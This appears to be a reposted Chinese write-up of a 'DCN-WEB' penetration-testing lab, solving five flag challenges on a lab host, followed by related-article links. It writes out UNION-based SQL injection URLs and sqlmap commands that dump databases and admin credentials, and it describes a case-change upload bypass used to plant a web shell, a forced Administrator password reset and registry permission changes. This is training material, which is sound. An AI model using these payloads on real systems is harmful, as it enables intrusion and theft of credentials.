2. 程式人生 > 其它 >DCN-WEB 滲透測試

DCN-WEB 滲透測試

阿新 發佈:2021-12-17

DCN-WEB 滲透測試

官方推薦使用他們提供的攻擊機來做題,但是那玩意太卡了.....

1

隨便點一個就是注入點

正常情況下

存在注入情況下

經過and 1=1測試後發現這是一個數字型的注入點,剩下就是手注或者直接跑sqlmap了

先手注入

回顯位2,3

資料庫名web

http://172.16.1.102/about.php?id=-1 union select 1,user(),(select group_concat(schema_name) from information_schema.schemata),4 --+

http://172.16.1.102/about.php?id=-1 union select 1,user(),(select group_concat(table_name) from information_schema.tables where table_schema='flag1'),4 --+

 
http://172.16.1.102/about.php?id=-1 union select 1,user(),(select group_concat(column_name) from information_schema.columns where table_name='key1') ,4 --+

http://172.16.1.102/about.php?id=-1 union select 1,user(),(select group_concat(flag) from flag1.key1),4 --+

sql注入跨庫參考指南:https://blog.csdn.net/lemeifei/article/details/121347468

法二:

python sqlmap.py -u http://172.16.1.102/about.php?id=1 -D flag1 -T key1 --dump

2

檢視頁面原始碼給出後臺路徑

藉助上一題的注入,直接獲得賬號密碼

>python sqlmap.py -u http://172.16.1.102/about.php?id=1 -D web -T admin --dump

完成登陸

3

此路徑上存在上傳點

http://172.16.1.102/manage/index.php

直接就大小寫繞過了,但是不允許上傳jpg就離譜,接下來就可以上菜刀,直接拿flag。

http://172.16.1.102/upload/month_2112/202112170146193774.Php

4

新增使用者

遠端登陸檢視,這樣子看不flag,可能使用者不用啟動檔案也不同

改重置administrator的密碼,登陸administrator使用者檢視一下

C:\Documents and Settings\Administrator\「開始」選單\程式\啟動

進去直接檔案形式開啟就可以獲得flag (雖然它提示是損壞了,其實就是改了個字尾名)

5

開啟登錄檔regedit,找到這個檔案,發現打不開??

因為當前使用者是管理員就直接修改一下許可權

然後關掉,重新開啟一次

就這個使用者

完了

相關推薦

DCN-WEB 滲透測試

DCN-WEB 滲透測試 官方推薦使用他們提供的攻擊機來做題,但是那玩意太卡了.....

Web滲透測試:資訊收集篇[轉載]

在之前的一系列文章中,我們主要講了內網滲透的一些知識,而在現實中,要進行內網滲透,一個很重要的前

Web滲透測試|SQL報錯注入

歡迎點選「演算法與程式設計之美」↑關注我們! 本文首發於微信公眾號:"演算法與程式設計之美",歡迎關注,及時瞭解更多此係列文章。

WEB滲透01_滲透測試方法論

1 滲透測試 滲透測試,是為了證明網路防禦按照預期計劃正常執行而提供的一種機制。不妨假設,你的公司定期更新安全策略和程式,時時給系統打補丁,並採用了漏洞掃描器等工具,以確保所有補丁都已打上。如果你早已做

滲透測試——web安全

滲透測試Web安全原理 Buchiyexiao SQL注入 SQL注入原理 SQL注入漏洞需要滿足兩個條件:引數使用者可控,即前端傳給後端的引數內容是使用者可控的;引數代入資料庫進行查詢,傳入的引數拼接到SQL語句,且代入資料庫

Web 安全攻防滲透測試實戰指南筆記之環境和工具

linux 下的LANMP 通過一些指令碼可以安裝基本web 環境 zend guard是一款PHP加密工具,經過加密的檔案必須安裝zend才能正常顯示頁面

滲透測試-02:web 前後端01

web前後端框架 HTML 學習 HTML 常用標籤 HTML 初始結構 新建檔案時喚出初始化標籤:!+Tab 補齊

Web應用滲透測試-資訊收集篇

  代理類工具:     Burpsuite(神器)       Zap Proxy   子域名挖掘類工具:

基於Selenium+Python的web自動化測試框架

一、什麼是Selenium? Selenium是一個基於瀏覽器的自動化測試工具,它提供了一種跨平臺、跨瀏覽器的端到端的web自動化解決方案。Selenium主要包括三部分:Selenium IDE、Selenium WebDriver 和Selenium Grid。

Docker學習10-docker-slenium進行web自動化測試

前言 實際上是 docker 中部署一個 Selenium Grid,它用於分散式自動化測試,就是一套Selenium 程式碼可在不同的環境上執行。

還在糾結搭建框架無從下手?Python + Selenium,分分鐘搭建 Web 自動化測試框架

在程式設計師的世界中,一切重複性的工作,都應該通過程式自動執行。「自動化測試」就是一個最好的例子。

滲透測試流程

滲透測試流程: 1.明確目標 2.分析風險,獲得授權 3.資訊收集 4.漏洞探測(手動&自動)

HTB 滲透測試筆記-Devel[msvenom]

------------恢復內容開始------------ 一般我先quick scan一波 然後再詳細的掃描 看到21 和80是開啟的

免費WEB壓力測試工具推薦

介紹 Siege是一個http/https負載測試和基準測試工具。它旨在讓WEB開發人員瞭解自己程式碼在壓力測試中的執行效能。

滲透測試面試問題合集

本文轉自網路,侵刪 一、思路流程 1、資訊收集 a、伺服器的相關資訊(真實ip,系統型別,版本,開放埠,WAF等)

滲透測試-資訊收集之nmap

0x01 nmap介紹 Nmap是一個開源,免費的網路探測工具,可以用來探測存活主機以及開放的埠等,支援windows,linux,mac等多種作業系統。

誰來教我滲透測試——黑客必須掌握的HTML基礎(二)

今天我們繼續看看html的學習筆記。 文字標籤 標題標籤<hn> 將文字設定為標題顯示的標籤對。設定標題字型大小,n=1(大)~6(小),標題大小一共有6種,也就是從<h1>……</h1>到<h6

Web自動化測試:郵件傳送測試報告

在我們執行完整個專案後,已經生成了 測試報告,一般自動化會在本地或者公司伺服器上執行,那如何獲取自動化測試的執行結果呢,此時就需要把測試結果以郵件的形式傳送到郵箱,這樣就可以在測試完成的第一時間知道測試

編寫web自動化測試

import unittest from time import sleep from selenium import webdriver class TestBdai(unittest.TestCase):

一個半路出家的滲透測試工程師(二)(持續更新中)

第一份工作持續了三個月,離職那一天的記憶過去了很久依然無法從腦海裡抹除。